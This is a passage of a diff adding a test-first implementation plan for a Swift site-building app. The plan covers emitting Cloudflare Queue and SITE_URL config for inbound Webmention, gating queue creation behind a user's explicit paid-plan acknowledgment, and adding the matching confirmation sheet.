+            self.d1DatabaseID = d1DatabaseID
+            self.kvNamespaceID = kvNamespaceID
+            self.r2BucketName = r2BucketName
+            self.queueName = queueName
+        }
+    }
+```
+
+Emit the queue blocks — insert right after the WEBMENTION_INBOX block added in Task 2:
+
+```swift
+        if hasWebmentionReceive {
+            lines.append("")
+            let queueName = resources.queueName ?? "\(siteName)-webmention"
+            lines.append("[[queues.producers]]")
+            lines.append("queue = \"\(queueName)\"")
+            lines.append("binding = \"WEBMENTION_QUEUE\"")
+            lines.append("")
+            lines.append("[[queues.consumers]]")
+            lines.append("queue = \"\(queueName)\"")
+            lines.append("max_batch_size = 10")
+            lines.append("max_batch_timeout = 30")
+            lines.append("max_retries = 3")
+        }
+```
+
+- [ ] **Step 4: Run to verify it passes**
+
+Run: `swift test --package-path . --filter WorkerCompositionTests`
+Expected: PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add Sources/AnglesiteCore/WorkerComposition.swift Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+git commit -m "feat(worker-composition): emit Cloudflare Queue blocks for webmention receive"
+```
+
+---
+
+### Task 4: Emit the `SITE_URL` var
+
+**Files:**
+- Modify: `Sources/AnglesiteCore/WorkerComposition.swift`
+- Test: `Tests/AnglesiteCoreTests/WorkerCompositionTests.swift`
+
+**Interfaces:**
+- Consumes: `hasWebmentionReceive` (Task 2)
+- Produces: `generateWranglerToml(..., siteURL: String? = nil)` new parameter
+
+- [ ] **Step 1: Write the failing test**
+
+```swift
+@Test("webmention receive with a known site URL emits a SITE_URL var")
+func webmentionEmitsSiteURL() throws {
+    let toml = try WorkerComposition.generateWranglerToml(
+        siteName: "my-site", workers: [webmentionWorker], siteURL: "https://my-site.example")
+    #expect(toml.contains("[vars]"))
+    #expect(toml.contains("SITE_URL = \"https://my-site.example\""))
+}
+
+@Test("webmention receive with no known site URL omits the vars block")
+func webmentionOmitsSiteURLWhenUnknown() throws {
+    let toml = try WorkerComposition.generateWranglerToml(siteName: "my-site", workers: [webmentionWorker])
+    #expect(!toml.contains("[vars]"))
+    #expect(!toml.contains("SITE_URL"))
+}
+
+@Test("siteURL is ignored when webmention receive isn't active")
+func siteURLIgnoredWithoutWebmention() throws {
+    let toml = try WorkerComposition.generateWranglerToml(
+        siteName: "my-site", workers: [indieauthWorker], siteURL: "https://my-site.example")
+    #expect(!toml.contains("SITE_URL"))
+}
+```
+
+- [ ] **Step 2: Run to verify it fails**
+
+Run: `swift test --package-path . --filter WorkerCompositionTests`
+Expected: FAIL — no `siteURL` parameter exists.
+
+- [ ] **Step 3: Implement**
+
+Add the parameter to `generateWranglerToml`'s signature (`Sources/AnglesiteCore/WorkerComposition.swift:69-76`):
+
+```swift
+    public static func generateWranglerToml(
+        siteName: String,
+        workers: [WorkerDescriptor],
+        routeClaims: [WorkerRouteClaim] = [],
+        resources: ProvisionedResources = .init(),
+        inboxCaptureEnabled: Bool = false,
+        inboxKVNamespaceID: String? = nil,
+        siteURL: String? = nil
+    ) throws -> String {
+```
+
+Emit the `[vars]` block — insert after the Queue blocks from Task 3, before the `hasIndieauth` secrets-comment block:
+
+```swift
+        if hasWebmentionReceive, let siteURL, !siteURL.isEmpty {
+            lines.append("")
+            lines.append("[vars]")
+            lines.append("SITE_URL = \"\(siteURL)\"")
+        }
+```
+
+- [ ] **Step 4: Run to verify it passes**
+
+Run: `swift test --package-path . --filter WorkerCompositionTests`
+Expected: PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add Sources/AnglesiteCore/WorkerComposition.swift Tests/AnglesiteCoreTests/WorkerCompositionTests.swift
+git commit -m "feat(worker-composition): emit SITE_URL var for webmention receive"
+```
+
+---
+
+### Task 5: `SiteSettings.webmentionReceivePaidPlanAcknowledged`
+
+A per-site, persisted opt-in flag — Cloudflare Queues require the Workers **Paid** plan, and the Queue must never be created without the user explicitly acknowledging that first (per the chosen "explicit opt-in confirmation" UX, no pre-flight API call before acknowledgment).
+
+**Files:**
+- Modify: `Sources/AnglesiteCore/SiteConfigStore.swift`
+- Test: `Tests/AnglesiteCoreTests/SiteConfigStoreTests.swift` (find the existing file; if it doesn't exist, check for wherever `SiteSettings` round-trip tests live — likely alongside `inboxCaptureAccountID`'s own test)
+
+**Interfaces:**
+- Produces: `SiteSettings.webmentionReceivePaidPlanAcknowledged: Bool?`
+
+- [ ] **Step 1: Find the existing `SiteSettings` round-trip test**
+
+Run: `grep -rn "inboxCaptureAccountID" Tests/AnglesiteCoreTests/*.swift`
+
+Add a sibling test in whichever file that finds (mirror its exact shape) asserting the new field round-trips through `PropertyListEncoder`/`PropertyListDecoder`:
+
+```swift
+@Test("webmentionReceivePaidPlanAcknowledged round-trips through PropertyListEncoder/Decoder")
+func webmentionPaidPlanFlagRoundTrips() throws {
+    let settings = SiteSettings(webmentionReceivePaidPlanAcknowledged: true)
+    let data = try PropertyListEncoder().encode(settings)
+    let decoded = try PropertyListDecoder().decode(SiteSettings.self, from: data)
+    #expect(decoded.webmentionReceivePaidPlanAcknowledged == true)
+}
+
+@Test("a settings.plist written before this field existed still decodes (forward-compat)")
+func decodesOldPlistWithoutPaidPlanField() throws {
+    let old = SiteSettings(displayName: "My Site")
+    let data = try PropertyListEncoder().encode(old)
+    let decoded = try PropertyListDecoder().decode(SiteSettings.self, from: data)
+    #expect(decoded.webmentionReceivePaidPlanAcknowledged == nil)
+}
+```
+
+- [ ] **Step 2: Run to verify it fails**
+
+Run: `swift test --package-path . --filter SiteConfigStoreTests` (adjust `--filter` to whatever suite name Step 1 found)
+Expected: FAIL — no such member.
+
+- [ ] **Step 3: Implement**
+
+In `Sources/AnglesiteCore/SiteConfigStore.swift`, add the field (after `provisionedWorkerResources`, following the file's existing "add fields as features need them" convention):
+
+```swift
+    /// Explicit opt-in: the user has acknowledged that enabling inbound Webmention requires the
+    /// Cloudflare Workers **Paid** plan (Cloudflare Queues aren't available on Free). `nil`/`false`
+    /// means `SocialWorkerProvisionCommand.provision` must not attempt to create the Queue —
+    /// see `DeployModel.webmentionPaidPlanConfirmationPresented`.
+    public var webmentionReceivePaidPlanAcknowledged: Bool?
+```
+
+Add it to `init` (both the parameter list and the assignment), after `provisionedWorkerResources`:
+
+```swift
+        provisionedWorkerResources: WorkerComposition.ProvisionedResources? = nil,
+        webmentionReceivePaidPlanAcknowledged: Bool? = nil
+    ) {
+        // ...existing assignments...
+        self.provisionedWorkerResources = provisionedWorkerResources
+        self.webmentionReceivePaidPlanAcknowledged = webmentionReceivePaidPlanAcknowledged
+    }
+```
+
+- [ ] **Step 4: Run to verify it passes**
+
+Run: `swift test --package-path . --filter SiteConfigStoreTests`
+Expected: PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add Sources/AnglesiteCore/SiteConfigStore.swift Tests/AnglesiteCoreTests/*.swift
+git commit -m "feat(site-settings): add webmentionReceivePaidPlanAcknowledged opt-in flag"
+```
+
+---
+
+### Task 6: `SocialWorkerProvisionCommand` — Queue creation gated on the opt-in
+
+**Files:**
+- Modify: `Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift`
+- Test: `Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift`
+
+**Interfaces:**
+- Consumes: `WorkerComposition.webmentionWorkerID`, `ProvisionedResources.queueName`, `generateWranglerToml(..., siteURL:)` (Tasks 2-4)
+- Produces: `SocialWorkerProvisionCommand.Result.webmentionPaidPlanConfirmationNeeded(resources:)`; `provision(..., siteURL: String? = nil, acknowledgesPaidPlan: Bool = false)`
+
+- [ ] **Step 1: Read the existing D1/KV/R2 provisioning test pattern**
+
+Run: `grep -n "func test\|@Test" Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift | head -30`
+
+Mirror whichever test's mock-runner setup already exists for D1/KV/R2 creation (it injects a `CommandRunner` closure returning canned `ProcessSupervisor.RunResult`s per `wrangler` subcommand). Write these new tests in that same style:
+
+```swift
+@Test("webmention worker without paid-plan acknowledgment returns webmentionPaidPlanConfirmationNeeded, no wrangler call")
+func webmentionWithoutAcknowledgmentBlocksBeforeAnyCall() async throws {
+    var calledArguments: [[String]] = []
+    let command = SocialWorkerProvisionCommand(
+        tokenSource: { "tok" },
+        runner: { _, arguments, _, _ in
+            calledArguments.append(arguments)
+            return .init(stdout: "", stderr: "unexpected call", exitCode: 1)
+        },
+        deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+    )
+    let webmention = WorkerDescriptor(
+        id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+        binding: .settingsActivated, resources: .init(needsD1: false, needsKV: false, needsR2: false))
+
+    let result = await command.provision(
+        siteID: "site-1", siteDirectory: tempSiteDirectory(), siteName: "my-site",
+        workers: [webmention], acknowledgesPaidPlan: false)
+
+    guard case .webmentionPaidPlanConfirmationNeeded = result else {
+        Issue.record("expected .webmentionPaidPlanConfirmationNeeded, got \(result)")
+        return
+    }
+    #expect(calledArguments.isEmpty, "must not call wrangler before the user acknowledges the paid-plan requirement")
+}
+
+@Test("webmention worker with acknowledgment creates the queue")
+func webmentionWithAcknowledgmentCreatesQueue() async throws {
+    var calledArguments: [[String]] = []
+    let command = SocialWorkerProvisionCommand(
+        tokenSource: { "tok" },
+        runner: { _, arguments, _, _ in
+            calledArguments.append(arguments)
+            if arguments.first == "queues" {
+                return .init(stdout: #"{"result":{"queue_name":"my-site-webmention"}}"#, stderr: "", exitCode: 0)
+            }
+            return .init(stdout: "", stderr: "", exitCode: 0)
+        },
+        deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+    )
+    let webmention = WorkerDescriptor(
+        id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+        binding: .settingsActivated, resources: .init(needsD1: false, needsKV: false, needsR2: false))
+
+    let result = await command.provision(
+        siteID: "site-1", siteDirectory: tempSiteDirectory(), siteName: "my-site",
+        workers: [webmention], acknowledgesPaidPlan: true)
+
+    guard case .succeeded(_, let resources, _) = result else {
+        Issue.record("expected .succeeded, got \(result)")
+        return
+    }
+    #expect(resources.queueName == "my-site-webmention")
+    #expect(calledArguments.contains(["queues", "create", "my-site-webmention", "--json"]))
+}
+
+@Test("an already-provisioned queue is not re-created")
+func alreadyProvisionedQueueSkipsCreation() async throws {
+    var calledArguments: [[String]] = []
+    let command = SocialWorkerProvisionCommand(
+        tokenSource: { "tok" },
+        runner: { _, arguments, _, _ in
+            calledArguments.append(arguments)
+            return .init(stdout: "", stderr: "", exitCode: 0)
+        },
+        deployer: { _, _, _ in .succeeded(url: URL(string: "https://example.com")!, duration: 0) }
+    )
+    let webmention = WorkerDescriptor(
+        id: "webmention", displayName: "Webmentions", description: "test", group: "social",
+        binding: .settingsActivated, resources: .init(needsD1: false, needsKV: false, needsR2: false))
+
+    let result = await command.provision(
+        siteID: "site-1", siteDirectory: tempSiteDirectory(), siteName: "my-site",
+        workers: [webmention], acknowledgesPaidPlan: true,
+        knownResources: .init(queueName: "my-site-webmention"))
+
+    guard case .succeeded = result else {
+        Issue.record("expected .succeeded, got \(result)")
+        return
+    }
+    #expect(!calledArguments.contains(where: { $0.first == "queues" }))
+}
+```
+
+(If `tempSiteDirectory()` isn't already a helper in this test file, check how the existing D1/KV/R2 tests get a `siteDirectory: URL` — reuse that exact helper instead of inventing a new one.)
+
+- [ ] **Step 2: Run to verify it fails**
+
+Run: `swift test --package-path . --filter SocialWorkerProvisionCommandTests`
+Expected: FAIL — `Result.webmentionPaidPlanConfirmationNeeded` and the new `provision` parameters don't exist.
+
+- [ ] **Step 3: Implement**
+
+Add the new result case (`Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift:13-21`):
+
+```swift
+    public enum Result: Sendable, Equatable {
+        case succeeded(url: URL, resources: WorkerComposition.ProvisionedResources, duration: TimeInterval)
+        case blocked(failures: [PreDeployCheck.ScanFailure], warnings: [PreDeployCheck.ScanWarning], resources: WorkerComposition.ProvisionedResources)
+        case workerNameConflict(name: String, resources: WorkerComposition.ProvisionedResources)
+        /// Webmention receive is active but the site hasn't explicitly acknowledged that
+        /// Cloudflare Queues require the Workers Paid plan (#359). Returned *before* any
+        /// wrangler call — `DeployModel` parks the deploy and presents a confirmation sheet;
+        /// retrying with `acknowledgesPaidPlan: true` proceeds to create the Queue.
+        case webmentionPaidPlanConfirmationNeeded(resources: WorkerComposition.ProvisionedResources)
+        case failed(reason: String, exitCode: Int32?, resources: WorkerComposition.ProvisionedResources)
+    }
+```
+
+Add the two new parameters to `provision` (`Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift:50-65`):
+
+```swift
+    public func provision(
+        siteID: String,
+        siteDirectory: URL,
+        siteName: String,
+        workers: [WorkerDescriptor],
+        routeClaims: [WorkerRouteClaim] = [],
+        knownResources: WorkerComposition.ProvisionedResources = .init(),
+        /// The site's best-known public URL (`.site-config`'s `DOMAIN`/`SITE_DOMAIN`/`SITE_URL`,
+        /// via `DeployCoordinator.resolveSiteURL`), threaded into `WorkerComposition`'s `SITE_URL`
+        /// var. `nil` on a first-ever deploy before any host is known — the composed Worker
+        /// degrades gracefully (worker.ts no-ops the queue consumer without it).
+        siteURL: String? = nil,
+        /// Explicit per-deploy opt-in that the user has acknowledged inbound Webmention requires
+        /// the Cloudflare Workers Paid plan (#359) — `DeployModel` sets this from
+        /// `SiteSettings.webmentionReceivePaidPlanAcknowledged` plus the in-flight confirmation
+        /// sheet's "Enable & retry" action. Ignored unless a `webmention` worker is active.
+        acknowledgesPaidPlan: Bool = false
+    ) async -> Result {
+```
+
+Right after the existing R2 block (after line 163, before the final unconditional `persistConfig` call at line 165), add the Queue creation step, gated on the acknowledgment — this is the "no pre-flight API call before acknowledgment" check, so it must come *before* any `runWrangler` call for the queue:
+
+```swift
+        let hasWebmentionReceive = workers.contains(where: { $0.id == WorkerComposition.webmentionWorkerID })
+        if hasWebmentionReceive, resources.queueName == nil {
+            guard acknowledgesPaidPlan else {
+                return .webmentionPaidPlanConfirmationNeeded(resources: resources)
+            }
+            let name = "\(siteName)-webmention"
+            let result = await runWrangler(
+                siteDirectory: siteDirectory,
+                arguments: ["queues", "create", name, "--json"],
+                environment: environment,
+                source: source,
+                resources: resources
+            )
+            switch result {
+            case .success:
+                resources.queueName = name
+            case .failure(let failure):
+                return failure
+            }
+            if let failure = persistConfig(
+                siteDirectory: siteDirectory, siteName: siteName, workers: workers,
+                routeClaims: routeClaims, resources: resources, siteURL: siteURL
+            ) {
+                return failure
+            }
+        }
+```
+
+Update every existing `persistConfig(...)` call site in this file (there are four: after the D1 block, after the KV block, after the R2 block, and the final unconditional one) to also pass `siteURL: siteURL` — and update `persistConfig`'s own signature and its call into `WorkerComposition.generateWranglerToml`:
+
+```swift
+    private func persistConfig(
+        siteDirectory: URL,
+        siteName: String,
+        workers: [WorkerDescriptor],
+        routeClaims: [WorkerRouteClaim],
+        resources: WorkerComposition.ProvisionedResources,
+        siteURL: String? = nil
+    ) -> Result? {
+        do {
+            let toml = try WorkerComposition.generateWranglerToml(
+                siteName: siteName,
+                workers: workers,
+                routeClaims: routeClaims,
+                resources: resources,
+                siteURL: siteURL
+            )
+            try toml.write(
+                to: siteDirectory.appendingPathComponent("wrangler.toml"),
+                atomically: true,
+                encoding: .utf8
+            )
+            return nil
+        } catch {
+            return .failed(reason: "couldn't write wrangler.toml: \(error)", exitCode: nil, resources: resources)
+        }
+    }
+```
+
+(Every call site — `persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources)` — becomes `persistConfig(siteDirectory: siteDirectory, siteName: siteName, workers: workers, routeClaims: routeClaims, resources: resources, siteURL: siteURL)`.)
+
+Finally, extend `readPersistedResources` so a queue created on a previous deploy is recognized without re-scraping (mirrors the existing `database_id`/`id`/`bucket_name` scrape at `Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift:255-265`) — add a `queue = "..."` scrape:
+
+```swift
+    static func readPersistedResources(from siteDirectory: URL) -> WorkerComposition.ProvisionedResources {
+        let url = siteDirectory.appendingPathComponent("wrangler.toml")
+        guard let toml = try? String(contentsOf: url, encoding: .utf8) else {
+            return .init()
+        }
+        return .init(
+            d1DatabaseID: extractTomlString(named: "database_id", from: toml),
+            kvNamespaceID: extractTomlString(named: "id", from: toml),
+            r2BucketName: extractTomlString(named: "bucket_name", from: toml),
+            queueName: extractTomlString(named: "queue", from: toml)
+        )
+    }
+```
+
+- [ ] **Step 4: Run to verify it passes**
+
+Run: `swift test --package-path . --filter SocialWorkerProvisionCommandTests`
+Expected: PASS. Also run the full suite once to catch any missed call site: `swift test --package-path . --filter AnglesiteCoreTests`
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add Sources/AnglesiteCore/SocialWorkerProvisionCommand.swift Tests/AnglesiteCoreTests/SocialWorkerProvisionCommandTests.swift
+git commit -m "feat(provisioning): create the webmention Queue behind an explicit paid-plan opt-in"
+```
+
+---
+
+### Task 7: `DeployCoordinator.resolveSiteURL`
+
+**Files:**
+- Modify: `Sources/AnglesiteCore/DeployCoordinator.swift`
+- Test: `Tests/AnglesiteCoreTests/DeployCoordinatorTests.swift` (find via `grep -rln resolveWorkerSiteName Tests/`)
+
+**Interfaces:**
+- Produces: `DeployCoordinator.resolveSiteURL(siteDirectory: URL) -> String?`
+
+- [ ] **Step 1: Write the failing test**
+
+Find the existing test file covering `resolveWorkerSiteName` (`grep -rln resolveWorkerSiteName Tests/AnglesiteCoreTests/`) and add sibling tests in the same style:
+
+```swift
+@Test("resolveSiteURL prefers DOMAIN over everything else")
+func resolveSiteURLPrefersDomain() throws {
+    let dir = try makeTempSiteDirectory()  // reuse whatever helper resolveWorkerSiteName's tests use
+    try "DOMAIN=example.com\nSITE_URL=https://my-site.workers.dev\n".write(
+        to: dir.appendingPathComponent(".site-config"), atomically: true, encoding: .utf8)
+    #expect(DeployCoordinator.resolveSiteURL(siteDirectory: dir) == "https://example.com")
+}
+
+@Test("resolveSiteURL falls back to the persisted SITE_URL when no custom domain is set")
+func resolveSiteURLFallsBackToSiteURL() throws {
+    let dir = try makeTempSiteDirectory()
+    try "SITE_URL=https://my-site.workers.dev\n".write(
+        to: dir.appendingPathComponent(".site-config"), atomically: true, encoding: .utf8)
+    #expect(DeployCoordinator.resolveSiteURL(siteDirectory: dir) == "https://my-site.workers.dev")
+}
+
+@Test("resolveSiteURL returns nil before any deploy has ever persisted a host")
+func resolveSiteURLNilBeforeFirstDeploy() throws {
+    let dir = try makeTempSiteDirectory()
+    #expect(DeployCoordinator.resolveSiteURL(siteDirectory: dir) == nil)
+}
+```
+
+- [ ] **Step 2: Run to verify it fails**
+
+Run: `swift test --package-path . --filter DeployCoordinatorTests`
+Expected: FAIL — no such function.
+
+- [ ] **Step 3: Implement**
+
+Add to `Sources/AnglesiteCore/DeployCoordinator.swift`, right after `resolveWorkerSiteName`:
+
+```swift
+    /// The site's best-known public URL for `WorkerComposition`'s `SITE_URL` var (#359): a
+    /// custom domain (`DOMAIN`/`SITE_DOMAIN`, `WebsiteAnalyticsAsset.bestHost`'s own precedence)
+    /// wins, given a scheme since those keys store a bare host; otherwise the workers.dev host
+    /// `DeployCommand.persistSiteURL` writes after the site's first successful deploy. `nil`
+    /// before any deploy has ever run and no custom domain is configured — the composed Worker
+    /// degrades gracefully without it (worker.ts's queue consumer no-ops).
+    public static func resolveSiteURL(siteDirectory: URL) -> String? {
+        let config = (try? WebsiteAnalyticsAsset.loadConfig(siteDirectory: siteDirectory)) ?? ""
+        if let domain = WebsiteAnalyticsAsset.configValue("DOMAIN", in: config)
+            ?? WebsiteAnalyticsAsset.configValue("SITE_DOMAIN", in: config) {
+            let trimmed = domain.trimmingCharacters(in: .whitespacesAndNewlines)
+            return trimmed.isEmpty ? nil : "https://\(trimmed)"
+        }
+        return WebsiteAnalyticsAsset.configValue("SITE_URL", in: config)
+    }
+```
+
+- [ ] **Step 4: Run to verify it passes**
+
+Run: `swift test --package-path . --filter DeployCoordinatorTests`
+Expected: PASS
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add Sources/AnglesiteCore/DeployCoordinator.swift Tests/AnglesiteCoreTests/DeployCoordinatorTests.swift
+git commit -m "feat(deploy): resolve the site's public URL for webmention's SITE_URL var"
+```
+
+---
+
+### Task 8: Wire the paid-plan confirmation into `DeployModel`
+
+Mirrors the existing `workerNameConflict` park-and-retry flow exactly (`Sources/AnglesiteApp/DeployModel.swift`) — same `pendingDeploy` tuple, same presented-`Bool`-plus-sheet shape, same "retry re-dispatches `deploy(...)`" mechanism.
+
+**Files:**
+- Modify: `Sources/AnglesiteApp/DeployModel.swift`
+
+**Interfaces:**
+- Consumes: `SocialWorkerProvisionCommand.Result.webmentionPaidPlanConfirmationNeeded`, `DeployCoordinator.resolveSiteURL`, `SiteSettings.webmentionReceivePaidPlanAcknowledged`
+- Produces: `DeployModel.Phase.webmentionPaidPlanConfirmationNeeded`, `webmentionPaidPlanConfirmationPresented: Bool`, `acknowledgeWebmentionPaidPlanAndRetry() async`, `cancelWebmentionPaidPlanConfirmation()`
+
+This task has no isolated unit test of its own — `DeployModel` is an app-target `@MainActor` view model that (per this repo's CLAUDE.md build notes) can't run under `swift test` on CI. Its correctness is verified by Task 8's own manual QA pass (Step 4) plus the fact that `SocialWorkerProvisionCommand`/`DeployCoordinator` — the logic it calls — are already covered by Tasks 6-7's tests.
+
+- [ ] **Step 1: Add the new `Phase` case and presented flag**
+
+In `Sources/AnglesiteApp/DeployModel.swift`, extend `Phase` (line 21-28):
+
+```swift
+    enum Phase: Equatable {
+        case idle
+        case running(siteID: String, since: Date)
+        case succeeded(url: URL, duration: TimeInterval)
+        case failed(reason: String, exitCode: Int32?)
+        case blocked(failures: [PreDeployCheck.ScanFailure], warnings: [PreDeployCheck.ScanWarning])
+        case workerNameConflict(name: String)
+        case webmentionPaidPlanConfirmationNeeded
+    }
+```
+
+Add the presented flag next to `workerNameConflictPresented` (after line 61):
+
+```swift
+    /// Bound to a `.sheet` in `SiteWindow` for the `.webmentionPaidPlanConfirmationNeeded`
+    /// outcome — inbound Webmention needs a Cloudflare Queue, which requires the Workers Paid
+    /// plan. Reuses `pendingDeploy` to park and retry, same as the token-prompt and
+    /// worker-name-conflict flows.
+    var webmentionPaidPlanConfirmationPresented: Bool = false
+```
+
+- [ ] **Step 2: Add the retry/cancel functions**
+
+Add right after `cancelWorkerNameConflictPrompt()` (after line 346):
+
+```swift
+    /// Called by the paid-plan confirmation sheet's "Enable & retry" button. Persists the
+    /// acknowledgment into `SiteSettings` (so future deploys never re-prompt) and retries the
+    /// parked deploy — `runDeploy` re-reads settings and passes `acknowledgesPaidPlan: true`
+    /// into `SocialWorkerProvisionCommand.provision`, which then creates the Queue.
+    func acknowledgeWebmentionPaidPlanAndRetry() async {
+        guard let pending = pendingDeploy else { return }
+        let configStore = SiteConfigStore(configDirectory: pending.configDirectory)
+        var settings = (try? await configStore.load()) ?? SiteSettings()
+        settings.webmentionReceivePaidPlanAcknowledged = true
+        try? await configStore.save(settings)
+        pendingDeploy = nil
+        // Deliberately NOT clearing webmentionPaidPlanConfirmationPresented here — mirrors
+        // renameWorkerAndRetry's identical reasoning: the sheet stays open while the retried
+        // deploy runs, and runDeploy's terminal cases dismiss it once the outcome is known.
+        deploy(
+            siteID: pending.siteID, siteDirectory: pending.siteDirectory,
+            configDirectory: pending.configDirectory, currentRoutes: pending.currentRoutes,
+            containerControlProvider: pending.containerControlProvider, siteName: pending.siteName)
+    }
+
+    func cancelWebmentionPaidPlanConfirmation() {
+        pendingDeploy = nil
+        webmentionPaidPlanConfirmationPresented = false
+    }
+```
+
+- [ ] **Step 3: Wire `runDeploy` — resolve `siteURL`/`acknowledgesPaidPlan`, pass them to `provision`, and handle the new result**
+
+In `runDeploy`, find where `settings` is loaded (`let settings = (try? await configStore.load()) ?? SiteSettings()`, near where `workerCatalog`/`activationPlan` are computed) and where `socialCommand.provision(...)` is called. Resolve the two new inputs right before the `provision` call:
+
+```swift
+        let siteURL = DeployCoordinator.resolveSiteURL(siteDirectory: siteDirectory)
+        let acknowledgesPaidPlan = settings.webmentionReceivePaidPlanAcknowledged ?? false
+```
+
+Update the `provision` call to pass them:
+
+```swift
+        let provisionResult = await socialCommand.provision(
+            siteID: siteID,
+            siteDirectory: siteDirectory,
+            siteName: workerSiteName,
+            workers: workers,
+            routeClaims: routeClaims.map(\.claim),
+            knownResources: settings.provisionedWorkerResources ?? .init(),
+            siteURL: siteURL,
+            acknowledgesPaidPlan: acknowledgesPaidPlan
+        )
+```
+
+Immediately after that call (before the existing `if case .succeeded(_, let resources, _) = provisionResult` block), intercept the new case and return early — mirroring the shape of the route-claim-validation early return earlier in the same function:
+
+```swift
+        if case .webmentionPaidPlanConfirmationNeeded = provisionResult {
+            pendingDeploy = (siteID, siteDirectory, configDirectory, currentRoutes, containerControlProvider, siteName)
+            subscription.cancel()
+            _ = await logTask.value
+            currentMilestone = nil
+            workerNameConflictPresented = false
+            transition(siteID: siteID, to: .webmentionPaidPlanConfirmationNeeded)
+            drawerPresented = false
+            webmentionPaidPlanConfirmationPresented = presentation == .foreground
+            return .failed(
+                reason: "Inbound Webmention requires the Cloudflare Workers Paid plan — confirm to continue",
+                exitCode: nil)
+        }
+```
+
+Finally, add a case to `deployAutomatically`'s result-mapping switch (near the existing `.workerNameConflict` case around line 247-248) — the background/invisible-publish path has no sheet to present, so it just surfaces this as a deferred/failed reason:
+
+Actually — `deployAutomatically` maps `DeployCommand.Result`, and this new interception returns a bare `.failed(reason:...)` directly from `runDeploy` before `result` is ever computed via `provisionResult.asDeployCommandResult`, so `deployAutomatically`'s existing `case .failed(let reason, _): return .failed(reason: reason)` arm already handles it correctly with no additional change needed. Confirm this by reading `deployAutomatically`'s switch (`Sources/AnglesiteApp/DeployModel.swift:242-251`) — no edit required there.
+
+- [ ] **Step 4: Manual QA pass**
+
+Build the app (`xcodebuild -project Anglesite.xcodeproj -scheme Anglesite -configuration Debug build` — run `xcodegen generate` first in this worktree), open a test site, toggle on the `webmention` worker (via whatever currently sets `SiteSettings.activeWorkerIDs` — if no UI exists yet for this, set it directly via a debug script or `SiteConfigStore` call), and deploy. Confirm:
+1. The deploy stops with the paid-plan confirmation sheet, and no `wrangler queues create` call happens (check the debug log pane for absence of a `queues` log line).
+2. Clicking "Enable & retry" persists the acknowledgment and the deploy proceeds to create the Queue.
+3. A second deploy on the same site does not re-prompt.
+
+- [ ] **Step 5: Commit**
+
+```bash
+git add Sources/AnglesiteApp/DeployModel.swift
+git commit -m "feat(deploy): park and confirm the webmention paid-plan opt-in before provisioning"
+```
+
+---
+
+### Task 9: The confirmation sheet view
+
+**Files:**
+- Create: `Sources/AnglesiteApp/WebmentionPaidPlanConfirmationSheetView.swift`
+- Modify: `Sources/AnglesiteApp/SiteWindow.swift` (near line 520, where `.sheet(isPresented: $bindableModel.deploy.workerNameConflictPresented)` is wired)
+
+**Interfaces:**
+- Consumes: `DeployModel.webmentionPaidPlanConfirmationPresented`, `.acknowledgeWebmentionPaidPlanAndRetry()`, `.cancelWebmentionPaidPlanConfirmation()`
+
+- [ ] **Step 1: Create the sheet view**
+
+```swift
+import SwiftUI
+import AnglesiteCore
+
+/// Sheet shown when a deploy needs to provision the Cloudflare Queue that inbound Webmention's
+/// async verification step relies on — Queues require the Workers **Paid** plan, so the app
+/// asks for an explicit one-time acknowledgment before ever calling `wrangler queues create`
+/// (#359). Mirrors `WorkerNameConflictSheetView`'s park-and-retry shape.
+struct WebmentionPaidPlanConfirmationSheetView: View {
+    let model: DeployModel
+    let onCancel: () -> Void
+
+    var body: some View {
+        VStack(alignment: .leading, spacing: 16) {
+            VStack(alignment: .leading, spacing: 4) {
+                Text("Inbound Webmention requires the Workers Paid plan")
+                    .font(.headline)
+                Text("Receiving webmentions verifies each one asynchronously using a Cloudflare Queue, which isn't available on the Workers Free plan. Continuing will create a Queue on your connected Cloudflare account.")
+                    .font(.callout)
+                    .foregroundStyle(.secondary)
+                    .fixedSize(horizontal: false, vertical: true)
+            }
+
+            HStack {
+                Spacer()
+                Button("Cancel") { onCancel() }
+                    .keyboardShortcut(.cancelAction)
+                Button("Enable & retry") {
+                    Task { await model.acknowledgeWebmentionPaidPlanAndRetry() }
+                }
+                .keyboardShortcut(.defaultAction)
+                .buttonStyle(.borderedProminent)
+            }
+        }
+        .padding(20)
+        .frame(width: 460)
+    }
+}
+
+#Preview {
+    WebmentionPaidPlanConfirmationSheetView(model: DeployModel(), onCancel: {})
+}
+```
+
+- [ ] **Step 2: Wire the sheet in `SiteWindow`**
+
+Find the existing `.sheet(isPresented: $bindableModel.deploy.workerNameConflictPresented) { ... }` block (`Sources/AnglesiteApp/SiteWindow.swift:520-525`) and add a sibling `.sheet` modifier immediately after it:
+
+```swift
+        .sheet(isPresented: $bindableModel.deploy.webmentionPaidPlanConfirmationPresented) {
+            WebmentionPaidPlanConfirmationSheetView(model: model.deploy) {
+                model.deploy.cancelWebmentionPaidPlanConfirmation()
+            }
+        }
+```
+
+- [ ] **Step 3: Build**
+
+Run (after `xcodegen generate` if the worktree's `.xcodeproj` predates this file):
+`xcodebuild -project Anglesite.xcodeproj -scheme Anglesite -configuration Debug build`
+Expected: build succeeds, no missing-file or unresolved-symbol errors.
+
+- [ ] **Step 4: Commit**
+
+```bash
+git add Sources/AnglesiteApp/WebmentionPaidPlanConfirmationSheetView.swift Sources/AnglesiteApp/SiteWindow.swift
+git commit -m "feat(deploy): add the webmention paid-plan confirmation sheet"
+```
+
+---
+
+### Task 10: Discovery — provisioning-gated `<link rel="webmention">`
+
